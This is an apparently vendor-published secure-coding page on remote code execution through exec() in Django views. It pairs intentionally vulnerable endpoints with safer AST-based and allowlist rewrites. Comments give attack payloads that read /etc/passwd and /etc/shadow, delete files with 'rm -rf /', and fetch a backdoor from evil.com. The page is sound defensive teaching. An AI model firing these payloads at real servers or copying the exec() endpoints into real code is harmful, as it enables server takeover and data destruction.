Remote code execution (RCE) from user input passed to exec in Django view

Critical Risk command-injection
pythondjangorceexeccode-injectionhttp-request

What it is

A critical security vulnerability where untrusted HTTP request data is executed with Python exec. exec evaluates attacker-controlled strings as code, enabling arbitrary command execution within the application process. RCE lets attackers execute arbitrary Python code on the server, leading to full compromise, data theft, or lateral movement.

# VULNERABLE: Django views with exec() usage
from django.http import JsonResponse, HttpResponse
from django.views.decorators.csrf import csrf_exempt
from django.shortcuts import render
import json

# VULNERABLE: Code execution endpoint
@csrf_exempt
def execute_code(request):
    if request.method == 'POST':
        try:
            data = json.loads(request.body)
            code = data.get('code', '')
            
            # CRITICAL VULNERABILITY: Direct exec() with user input
            exec(code)
            
            return JsonResponse({'status': 'Code executed successfully'})
        except Exception as e:
            return JsonResponse({'error': str(e)})
    
    return JsonResponse({'error': 'POST method required'})

# VULNERABLE: Expression evaluator
@csrf_exempt
def calculate(request):
    if request.method == 'GET':
        expression = request.GET.get('expr', '')
        
        if expression:
            try:
                # DANGEROUS: exec() for calculation
                local_vars = {}
                exec(f'result = {expression}', {}, local_vars)
                
                return JsonResponse({
                    'expression': expression,
                    'result': local_vars.get('result')
                })
            except Exception as e:
                return JsonResponse({'error': str(e)})
    
    return render(request, 'calculator.html')

# VULNERABLE: Dynamic template processing
@csrf_exempt
def process_template(request):
    if request.method == 'POST':
        data = json.loads(request.body)
        template_code = data.get('template', '')
        context_data = data.get('context', {})
        
        try:
            # DANGEROUS: exec() with template code
            local_context = {'context': context_data, 'result': ''}
            exec(template_code, {}, local_context)
            
            return JsonResponse({
                'result': local_context.get('result', ''),
                'status': 'Template processed'
            })
        except Exception as e:
            return JsonResponse({'error': str(e)})
    
    return JsonResponse({'error': 'POST required'})

# VULNERABLE: Admin utility
@csrf_exempt
def admin_util(request):
    if request.method == 'POST':
        data = json.loads(request.body)
        operation = data.get('operation', '')
        
        # DANGEROUS: Building and executing code dynamically
        if operation == 'user_count':
            code = 'from django.contrib.auth.models import User; count = User.objects.count()'
        elif operation == 'cleanup':
            code = data.get('cleanup_code', '')
        else:
            code = data.get('custom_code', '')
        
        try:
            # CRITICAL: exec() with admin operations
            local_vars = {}
            exec(code, {}, local_vars)
            
            return JsonResponse({
                'operation': operation,
                'result': str(local_vars),
                'status': 'executed'
            })
        except Exception as e:
            return JsonResponse({'error': str(e)})
    
    return JsonResponse({'error': 'POST required'})

# Attack examples:
# POST /execute/ {"code": "import os; os.system('cat /etc/passwd')"}
# GET /calculate/?expr=__import__('subprocess').check_output(['whoami'])
# POST /template/ {"template": "import shutil; shutil.rmtree('/var/www')"}
# POST /admin/ {"operation": "cleanup", "cleanup_code": "__import__('os').system('rm -rf /')"}

# URLs configuration
from django.urls import path

urlpatterns = [
    path('execute/', execute_code, name='execute_code'),
    path('calculate/', calculate, name='calculate'),
    path('template/', process_template, name='process_template'),
    path('admin/', admin_util, name='admin_util'),
]
# SECURE: Django views without exec() usage
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import login_required, permission_required
from django.views.decorators.http import require_http_methods
from django.core.cache import cache
from django.contrib.auth.models import User
from django.utils.decorators import method_decorator
from django.views import View
from django import forms
import json
import ast
import operator
import time
import logging

logger = logging.getLogger(__name__)

# SECURE: Safe expression evaluator
class SafeMathEvaluator:
    ALLOWED_OPERATIONS = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Mod: operator.mod,
        ast.Pow: operator.pow,
        ast.USub: operator.neg,
        ast.UAdd: operator.pos
    }
    
    ALLOWED_FUNCTIONS = {
        'abs': abs,
        'round': round,
        'min': min,
        'max': max
    }
    
    def evaluate(self, expression: str, max_length: int = 100):
        if len(expression) > max_length:
            raise ValueError('Expression too long')
        
        try:
            tree = ast.parse(expression, mode='eval')
            return self._eval_node(tree.body)
        except (SyntaxError, ValueError) as e:
            raise ValueError(f'Invalid expression: {e}')
    
    def _eval_node(self, node):
        if isinstance(node, ast.Constant):
            if isinstance(node.value, (int, float)):
                if abs(node.value) > 1e10:
                    raise ValueError('Number too large')
                return node.value
            raise ValueError('Only numbers allowed')
        
        elif isinstance(node, ast.BinOp):
            left = self._eval_node(node.left)
            right = self._eval_node(node.right)
            op = self.ALLOWED_OPERATIONS.get(type(node.op))
            if op:
                try:
                    result = op(left, right)
                    if abs(result) > 1e10:
                        raise ValueError('Result too large')
                    return result
                except ZeroDivisionError:
                    raise ValueError('Division by zero')
            raise ValueError('Operation not allowed')
        
        elif isinstance(node, ast.UnaryOp):
            operand = self._eval_node(node.operand)
            op = self.ALLOWED_OPERATIONS.get(type(node.op))
            if op:
                return op(operand)
            raise ValueError('Unary operation not allowed')
        
        elif isinstance(node, ast.Call):
            if isinstance(node.func, ast.Name):
                func_name = node.func.id
                if func_name in self.ALLOWED_FUNCTIONS:
                    args = [self._eval_node(arg) for arg in node.args]
                    if len(args) > 5:
                        raise ValueError('Too many function arguments')
                    return self.ALLOWED_FUNCTIONS[func_name](*args)
            raise ValueError('Function not allowed')
        
        raise ValueError('Expression type not allowed')

# SECURE: Data operations with allowlisting
class SecureDataOperations:
    ALLOWED_OPERATIONS = {
        'user_count': 'get_user_count',
        'user_info': 'get_user_info',
        'system_status': 'get_system_status'
    }
    
    def execute(self, operation: str, params: dict):
        if operation not in self.ALLOWED_OPERATIONS:
            raise ValueError(f'Operation not allowed: {operation}')
        
        method_name = self.ALLOWED_OPERATIONS[operation]
        method = getattr(self, method_name)
        return method(params)
    
    def get_user_count(self, params: dict):
        return {'total_users': User.objects.count()}
    
    def get_user_info(self, params: dict):
        user_id = params.get('user_id')
        if not isinstance(user_id, int) or user_id <= 0:
            raise ValueError('Valid user_id required')
        
        try:
            user = User.objects.get(id=user_id)
            return {
                'username': user.username,
                'date_joined': user.date_joined.isoformat(),
                'is_active': user.is_active
            }
        except User.DoesNotExist:
            raise ValueError('User not found')
    
    def get_system_status(self, params: dict):
        return {
            'timestamp': time.time(),
            'status': 'operational'
        }

# Form validation
class CalculationForm(forms.Form):
    expression = forms.CharField(max_length=100, strip=True)
    
    def clean_expression(self):
        expr = self.cleaned_data['expression']
        # Basic validation
        if not expr:
            raise forms.ValidationError('Expression cannot be empty')
        
        # Check for dangerous patterns
        dangerous_patterns = ['import', 'exec', 'eval', '__', 'open', 'file']
        expr_lower = expr.lower()
        for pattern in dangerous_patterns:
            if pattern in expr_lower:
                raise forms.ValidationError('Expression contains forbidden keywords')
        
        return expr

class DataOperationForm(forms.Form):
    operation = forms.ChoiceField(choices=[
        ('user_count', 'User Count'),
        ('user_info', 'User Info'),
        ('system_status', 'System Status')
    ])
    user_id = forms.IntegerField(min_value=1, required=False)

# SECURE: Rate limiting decorator
def rate_limit(max_requests=10, window=60):
    def decorator(view_func):
        def wrapper(request, *args, **kwargs):
            if request.user.is_authenticated:
                key = f'rate_limit_{request.user.id}'
            else:
                key = f'rate_limit_{request.META.get("REMOTE_ADDR")}'
            
            current = cache.get(key, 0)
            if current >= max_requests:
                return JsonResponse({'error': 'Rate limit exceeded'}, status=429)
            
            cache.set(key, current + 1, window)
            return view_func(request, *args, **kwargs)
        return wrapper
    return decorator

# SECURE: Views with proper validation
@require_http_methods(['POST'])
@csrf_protect
@rate_limit(max_requests=5, window=60)
def safe_calculate(request):
    try:
        data = json.loads(request.body)
        form = CalculationForm(data)
        
        if not form.is_valid():
            return JsonResponse({
                'error': 'Validation failed',
                'details': form.errors
            }, status=400)
        
        expression = form.cleaned_data['expression']
        
        # Use safe evaluator
        evaluator = SafeMathEvaluator()
        result = evaluator.evaluate(expression)
        
        return JsonResponse({
            'expression': expression,
            'result': result
        })
        
    except json.JSONDecodeError:
        return JsonResponse({'error': 'Invalid JSON'}, status=400)
    except ValueError as e:
        return JsonResponse({'error': str(e)}, status=400)
    except Exception as e:
        logger.error(f'Calculation error: {e}')
        return JsonResponse({'error': 'Calculation failed'}, status=500)

@require_http_methods(['POST'])
@csrf_protect
@login_required
@permission_required('auth.view_user', raise_exception=True)
@rate_limit(max_requests=20, window=60)
def secure_data_operation(request):
    try:
        data = json.loads(request.body)
        form = DataOperationForm(data)
        
        if not form.is_valid():
            return JsonResponse({
                'error': 'Validation failed',
                'details': form.errors
            }, status=400)
        
        # Execute operation safely
        operations = SecureDataOperations()
        result = operations.execute(
            form.cleaned_data['operation'],
            form.cleaned_data
        )
        
        return JsonResponse({
            'operation': form.cleaned_data['operation'],
            'result': result
        })
        
    except json.JSONDecodeError:
        return JsonResponse({'error': 'Invalid JSON'}, status=400)
    except ValueError as e:
        return JsonResponse({'error': str(e)}, status=400)
    except Exception as e:
        logger.error(f'Data operation error: {e}')
        return JsonResponse({'error': 'Operation failed'}, status=500)

@require_http_methods(['GET'])
def list_operations(request):
    operations = SecureDataOperations()
    return JsonResponse({
        'available_operations': list(operations.ALLOWED_OPERATIONS.keys()),
        'math_functions': list(SafeMathEvaluator.ALLOWED_FUNCTIONS.keys())
    })

# URLs configuration
from django.urls import path

urlpatterns = [
    path('api/calculate/', safe_calculate, name='safe_calculate'),
    path('api/data/', secure_data_operation, name='secure_data'),
    path('api/operations/', list_operations, name='list_operations'),
]

💡 Why This Fix Works

The vulnerable code uses exec() with user input, allowing arbitrary code execution. The secure version eliminates exec() entirely, implements safe expression evaluation using AST parsing, uses Django forms for validation, adds CSRF protection, rate limiting, and proper authentication/authorization checks.

Why it happens

Using exec() to execute code strings built from HTTP request data. This allows attackers to execute arbitrary Python code by injecting malicious expressions through form data, URL parameters, or JSON payloads.

Root causes

exec() with Request Data

Using exec() to execute code strings built from HTTP request data. This allows attackers to execute arbitrary Python code by injecting malicious expressions through form data, URL parameters, or JSON payloads.

Preview example – PYTHON
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
import json

# VULNERABLE: exec() with request data
@csrf_exempt
def execute_code(request):
    if request.method == 'POST':
        data = json.loads(request.body)
        code = data.get('code', '')
        
        # CRITICAL VULNERABILITY: Direct code execution
        exec(code)
        
        return JsonResponse({'status': 'executed'})
    
    return JsonResponse({'error': 'POST required'})

# Attack example:
# POST {"code": "import os; os.system('wget evil.com/backdoor.py')"}
# POST {"code": "open('/etc/passwd').read()"}
# POST {"code": "__import__('subprocess').call(['rm', '-rf', '/'])"}

Dynamic Code Generation in Views

Building and executing Python code dynamically based on user input in Django views. This is often seen in template engines, expression evaluators, or configuration processors that mistakenly use exec().

Preview example – PYTHON
from django.shortcuts import render
from django.http import JsonResponse

# VULNERABLE: Dynamic code execution
def calculate_expression(request):
    expression = request.GET.get('expr', '')
    
    if expression:
        try:
            # DANGEROUS: Building code with user input
            code = f"result = {expression}"
            
            # CRITICAL: exec() with user-controlled code
            local_vars = {}
            exec(code, {}, local_vars)
            
            return JsonResponse({'result': local_vars.get('result')})
        except Exception as e:
            return JsonResponse({'error': str(e)})
    
    return JsonResponse({'error': 'Expression required'})

# Attack examples:
# GET /?expr=__import__('os').system('cat /etc/passwd')
# GET /?expr=open('/etc/shadow').read()
# GET /?expr=__import__('subprocess').check_output(['whoami'])

Fixes

1

Remove exec() and Use Safe Alternatives

Eliminate exec() usage entirely. Use ast.literal_eval() for safe literal evaluation, implement explicit business logic, or use sandboxed expression evaluators.

View implementation – PYTHON
import ast
import operator
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.views.decorators.http import require_http_methods
import json

# SECURE: Safe expression evaluator without exec()
class SafeExpressionEvaluator:
    ALLOWED_OPERATORS = {
        ast.Add: operator.add,
        ast.Sub: operator.sub,
        ast.Mult: operator.mul,
        ast.Div: operator.truediv,
        ast.Mod: operator.mod,
        ast.Pow: operator.pow,
        ast.USub: operator.neg,
        ast.UAdd: operator.pos
    }
    
    ALLOWED_FUNCTIONS = {
        'abs': abs,
        'round': round,
        'min': min,
        'max': max,
        'sum': sum
    }
    
    def evaluate(self, expression: str) -> float:
        try:
            # Parse expression into AST
            tree = ast.parse(expression, mode='eval')
            return self._evaluate_node(tree.body)
        except (ValueError, SyntaxError, TypeError) as e:
            raise ValueError(f'Invalid expression: {e}')
    
    def _evaluate_node(self, node):
        if isinstance(node, ast.Constant):  # Python 3.8+
            if isinstance(node.value, (int, float)):
                return node.value
            else:
                raise ValueError('Only numbers allowed')
        
        elif isinstance(node, ast.Num):  # Python < 3.8
            return node.n
        
        elif isinstance(node, ast.BinOp):
            left = self._evaluate_node(node.left)
            right = self._evaluate_node(node.right)
            op_func = self.ALLOWED_OPERATORS.get(type(node.op))
            if op_func:
                return op_func(left, right)
            else:
                raise ValueError('Operator not allowed')
        
        elif isinstance(node, ast.UnaryOp):
            operand = self._evaluate_node(node.operand)
            op_func = self.ALLOWED_OPERATORS.get(type(node.op))
            if op_func:
                return op_func(operand)
            else:
                raise ValueError('Unary operator not allowed')
        
        elif isinstance(node, ast.Call):
            if isinstance(node.func, ast.Name):
                func_name = node.func.id
                if func_name in self.ALLOWED_FUNCTIONS:
                    args = [self._evaluate_node(arg) for arg in node.args]
                    return self.ALLOWED_FUNCTIONS[func_name](*args)
            raise ValueError('Function not allowed')
        
        else:
            raise ValueError('Expression type not allowed')

# SECURE: Django view with safe evaluation
@require_http_methods(['POST'])
@csrf_exempt
def safe_calculate(request):
    try:
        data = json.loads(request.body)
        expression = data.get('expression', '').strip()
        
        if not expression:
            return JsonResponse({'error': 'Expression required'}, status=400)
        
        # Validate expression length
        if len(expression) > 100:
            return JsonResponse({'error': 'Expression too long'}, status=400)
        
        # Use safe evaluator
        evaluator = SafeExpressionEvaluator()
        result = evaluator.evaluate(expression)
        
        return JsonResponse({
            'expression': expression,
            'result': result
        })
        
    except json.JSONDecodeError:
        return JsonResponse({'error': 'Invalid JSON'}, status=400)
    except ValueError as e:
        return JsonResponse({'error': str(e)}, status=400)
    except Exception as e:
        return JsonResponse({'error': 'Calculation failed'}, status=500)
2

Implement Function Allowlisting

Create explicit mappings of allowed operations to safe implementations. Use dictionaries to map user choices to predefined functions instead of dynamic code execution.

View implementation – PYTHON
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_exempt
from django.contrib.auth.decorators import login_required
from django.core.cache import cache
import json
import hashlib
import time

# SECURE: Function allowlisting approach
class SecureDataProcessor:
    ALLOWED_OPERATIONS = {
        'user_stats': 'get_user_statistics',
        'post_count': 'get_post_count',
        'recent_activity': 'get_recent_activity',
        'system_status': 'get_system_status'
    }
    
    def execute_operation(self, operation_name: str, params: dict):
        if operation_name not in self.ALLOWED_OPERATIONS:
            raise ValueError(f'Operation not allowed: {operation_name}')
        
        method_name = self.ALLOWED_OPERATIONS[operation_name]
        method = getattr(self, method_name, None)
        
        if not method or not callable(method):
            raise ValueError(f'Operation not implemented: {operation_name}')
        
        return method(params)
    
    def get_user_statistics(self, params: dict):
        from django.contrib.auth.models import User
        
        # Validate parameters
        user_id = params.get('user_id')
        if not isinstance(user_id, int) or user_id <= 0:
            raise ValueError('Valid user_id required')
        
        try:
            user = User.objects.get(id=user_id)
            return {
                'username': user.username,
                'date_joined': user.date_joined.isoformat(),
                'last_login': user.last_login.isoformat() if user.last_login else None,
                'is_active': user.is_active
            }
        except User.DoesNotExist:
            raise ValueError('User not found')
    
    def get_post_count(self, params: dict):
        from myapp.models import Post  # Replace with actual model
        
        # Optional filtering
        author_id = params.get('author_id')
        if author_id and isinstance(author_id, int):
            return {'count': Post.objects.filter(author_id=author_id).count()}
        else:
            return {'count': Post.objects.count()}
    
    def get_recent_activity(self, params: dict):
        # Implementation for recent activity
        limit = min(params.get('limit', 10), 100)  # Max 100 items
        return {'activities': []}  # Placeholder
    
    def get_system_status(self, params: dict):
        return {
            'timestamp': time.time(),
            'status': 'operational',
            'version': '1.0.0'
        }

@login_required
@require_http_methods(['POST'])
@csrf_exempt
def secure_data_operation(request):
    try:
        # Rate limiting
        user_key = f'data_op_rate_limit_{request.user.id}'
        current_requests = cache.get(user_key, 0)
        if current_requests >= 10:  # 10 requests per minute
            return JsonResponse({'error': 'Rate limit exceeded'}, status=429)
        
        cache.set(user_key, current_requests + 1, 60)  # 60 seconds
        
        # Parse and validate request
        data = json.loads(request.body)
        operation = data.get('operation', '').strip()
        params = data.get('params', {})
        
        if not operation:
            return JsonResponse({'error': 'Operation required'}, status=400)
        
        if not isinstance(params, dict):
            return JsonResponse({'error': 'Params must be object'}, status=400)
        
        # Execute operation safely
        processor = SecureDataProcessor()
        result = processor.execute_operation(operation, params)
        
        return JsonResponse({
            'operation': operation,
            'result': result,
            'timestamp': time.time()
        })
        
    except json.JSONDecodeError:
        return JsonResponse({'error': 'Invalid JSON'}, status=400)
    except ValueError as e:
        return JsonResponse({'error': str(e)}, status=400)
    except Exception as e:
        # Log error for debugging
        import logging
        logger = logging.getLogger(__name__)
        logger.error(f'Data operation error: {e}')
        
        return JsonResponse({'error': 'Operation failed'}, status=500)
3

Use Django's Built-in Security Features

Leverage Django's security middleware, CSRF protection, permissions system, and input validation. Implement proper authentication and authorization for sensitive operations.

View implementation – PYTHON
from django.http import JsonResponse
from django.views.decorators.csrf import csrf_protect
from django.contrib.auth.decorators import permission_required
from django.utils.decorators import method_decorator
from django.views import View
from django.core.exceptions import ValidationError
from django import forms
import json

# SECURE: Django form validation
class DataOperationForm(forms.Form):
    OPERATION_CHOICES = [
        ('stats', 'User Statistics'),
        ('posts', 'Post Count'),
        ('activity', 'Recent Activity')
    ]
    
    operation = forms.ChoiceField(choices=OPERATION_CHOICES)
    user_id = forms.IntegerField(min_value=1, required=False)
    limit = forms.IntegerField(min_value=1, max_value=100, required=False)
    
    def clean_user_id(self):
        user_id = self.cleaned_data.get('user_id')
        if user_id:
            from django.contrib.auth.models import User
            if not User.objects.filter(id=user_id).exists():
                raise ValidationError('User does not exist')
        return user_id

# SECURE: Class-based view with proper security
@method_decorator(csrf_protect, name='dispatch')
@method_decorator(permission_required('myapp.view_data', raise_exception=True), name='dispatch')
class SecureDataView(View):
    
    def post(self, request):
        try:
            # Parse request data
            data = json.loads(request.body)
            
            # Validate using Django forms
            form = DataOperationForm(data)
            if not form.is_valid():
                return JsonResponse({
                    'error': 'Validation failed',
                    'details': form.errors
                }, status=400)
            
            # Execute validated operation
            result = self._execute_operation(
                form.cleaned_data['operation'],
                form.cleaned_data
            )
            
            return JsonResponse({
                'success': True,
                'result': result
            })
            
        except json.JSONDecodeError:
            return JsonResponse({'error': 'Invalid JSON'}, status=400)
        except Exception as e:
            return JsonResponse({'error': 'Operation failed'}, status=500)
    
    def _execute_operation(self, operation: str, params: dict):
        operations = {
            'stats': self._get_user_stats,
            'posts': self._get_post_count,
            'activity': self._get_recent_activity
        }
        
        return operations[operation](params)
    
    def _get_user_stats(self, params: dict):
        from django.contrib.auth.models import User
        
        user_id = params.get('user_id')
        if user_id:
            user = User.objects.get(id=user_id)
            return {
                'username': user.username,
                'date_joined': user.date_joined.isoformat(),
                'is_active': user.is_active
            }
        else:
            return {'total_users': User.objects.count()}
    
    def _get_post_count(self, params: dict):
        from myapp.models import Post
        
        user_id = params.get('user_id')
        if user_id:
            return {'count': Post.objects.filter(author_id=user_id).count()}
        else:
            return {'count': Post.objects.count()}
    
    def _get_recent_activity(self, params: dict):
        limit = params.get('limit', 10)
        # Implementation here
        return {'activities': [], 'limit': limit}

# URL configuration
from django.urls import path

urlpatterns = [
    path('api/data/', SecureDataView.as_view(), name='secure_data'),
]

# Settings.py security configuration
# SECURE_BROWSER_XSS_FILTER = True
# SECURE_CONTENT_TYPE_NOSNIFF = True
# X_FRAME_OPTIONS = 'DENY'
# CSRF_COOKIE_SECURE = True  # Enable in production with HTTPS
# SESSION_COOKIE_SECURE = True  # Enable in production with HTTPS

Detect This Vulnerability in Your Code

Sourcery automatically identifies remote code execution (rce) from user input passed to exec in django view and many other security issues in your codebase.